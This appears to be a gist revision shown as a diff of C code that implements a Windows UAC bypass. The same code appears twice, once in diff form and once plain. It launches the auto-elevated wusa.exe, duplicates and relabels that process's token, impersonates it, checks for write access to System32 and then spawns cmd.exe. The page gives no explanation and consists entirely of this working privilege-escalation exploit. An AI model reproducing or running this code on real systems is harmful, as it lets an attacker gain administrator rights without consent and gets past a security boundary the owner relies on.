0x4243 · May 28, 2017 19:35
diff --git a/gistfile1.txt b/gistfile1.txt
 	DWORD Error, bytesIO;
 	NTSTATUS Status;
 	HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
 	BOOL bCond = FALSE;
 	SHELLEXECUTEINFO shinfo;
 	SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
 	TOKEN_MANDATORY_LABEL tml, *ptml;
 	PSID pIntegritySid = NULL;
 	STARTUPINFO si;
 	PROCESS_INFORMATION pi;
 	WCHAR szBuffer[MAX_PATH];

 	RtlSecureZeroMemory(&shinfo, sizeof(shinfo));

 	do {

 		hTest = CreateFile(L"C:\\windows\\system32\\test.txt", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL);
 		if (hTest != INVALID_HANDLE_VALUE) {
 			CloseHandle(hTest);
 		}
 		else {
 			MessageBox(GetDesktopWindow(), L"Access denied", NULL, MB_OK);
 		}

 		shinfo.cbSize = sizeof(shinfo);
 		shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
 		shinfo.lpFile = L"wusa.exe";
 		shinfo.nShow = SW_SHOW;
 		if (!ShellExecuteEx(&shinfo))
 			break;
 	
 		if (!OpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken))
 			break;

 		if (!DuplicateTokenEx(hProcessToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken))
 			break;

 		if (!AllocateAndInitializeSid(&MLAuthority, 1, SECURITY_MANDATORY_MEDIUM_RID,
 			0, 0, 0, 0, 0, 0, 0, &pIntegritySid))
 		{
 			break;
 		}

 		tml.Label.Attributes = SE_GROUP_INTEGRITY;
 		tml.Label.Sid = pIntegritySid;
 	
 		Status = NtSetInformationToken(hNewToken, TokenIntegrityLevel, &tml,
 			sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid));
 		if (!NT_SUCCESS(Status))
 			break;

 		if (!ImpersonateLoggedOnUser(hNewToken))
 			break;

 		hTest = CreateFile(L"C:\\windows\\system32\\test.txt", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL);
 		if (hTest != INVALID_HANDLE_VALUE) {
 			MessageBox(GetDesktopWindow(), L"Hit", NULL, MB_OK);
 			CloseHandle(hTest);

 			RtlSecureZeroMemory(&si, sizeof(si));
 			si.cb = sizeof(si);
 			si.dwFlags = STARTF_USESHOWWINDOW;
 			si.wShowWindow = SW_SHOW;
 			_strcpy(szBuffer, L"cmd.exe");
 			CreateProcessWithLogonW(L"test", L"test", L"test", LOGON_NETCREDENTIALS_ONLY, szBuffer, NULL, 0, NULL, NULL, &si, &pi);
 		}

 	} while (bCond);

 	if (shinfo.hProcess) CloseHandle(shinfo.hProcess);
 	if (hProcessToken) CloseHandle(hProcessToken);
  if (hNewToken) CloseHandle(hNewToken);
	DWORD Error, bytesIO;
	NTSTATUS Status;
	HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
	BOOL bCond = FALSE;
	SHELLEXECUTEINFO shinfo;
	SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
	TOKEN_MANDATORY_LABEL tml, *ptml;
	PSID pIntegritySid = NULL;
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	WCHAR szBuffer[MAX_PATH];

	RtlSecureZeroMemory(&shinfo, sizeof(shinfo));

	do {

	hTest = CreateFile(L"C:\\windows\\system32\\test.txt", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL);
	if (hTest != INVALID_HANDLE_VALUE) {
	CloseHandle(hTest);
	}
	else {
	MessageBox(GetDesktopWindow(), L"Access denied", NULL, MB_OK);
	}

	shinfo.cbSize = sizeof(shinfo);
	shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
	shinfo.lpFile = L"wusa.exe";
	shinfo.nShow = SW_SHOW;
	if (!ShellExecuteEx(&shinfo))
	break;

	if (!OpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken))
	break;

	if (!DuplicateTokenEx(hProcessToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken))
	break;

	if (!AllocateAndInitializeSid(&MLAuthority, 1, SECURITY_MANDATORY_MEDIUM_RID,
	0, 0, 0, 0, 0, 0, 0, &pIntegritySid))
	{
	break;
	}

	tml.Label.Attributes = SE_GROUP_INTEGRITY;
	tml.Label.Sid = pIntegritySid;

	Status = NtSetInformationToken(hNewToken, TokenIntegrityLevel, &tml,
	sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid));
	if (!NT_SUCCESS(Status))
	break;

	if (!ImpersonateLoggedOnUser(hNewToken))
	break;

	hTest = CreateFile(L"C:\\windows\\system32\\test.txt", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL);
	if (hTest != INVALID_HANDLE_VALUE) {
	MessageBox(GetDesktopWindow(), L"Hit", NULL, MB_OK);
	CloseHandle(hTest);

	RtlSecureZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	si.dwFlags = STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_SHOW;
	_strcpy(szBuffer, L"cmd.exe");
	CreateProcessWithLogonW(L"test", L"test", L"test", LOGON_NETCREDENTIALS_ONLY, szBuffer, NULL, 0, NULL, NULL, &si, &pi);
	}

	} while (bCond);

	if (shinfo.hProcess) CloseHandle(shinfo.hProcess);
	if (hProcessToken) CloseHandle(hProcessToken);
	if (hNewToken) CloseHandle(hNewToken);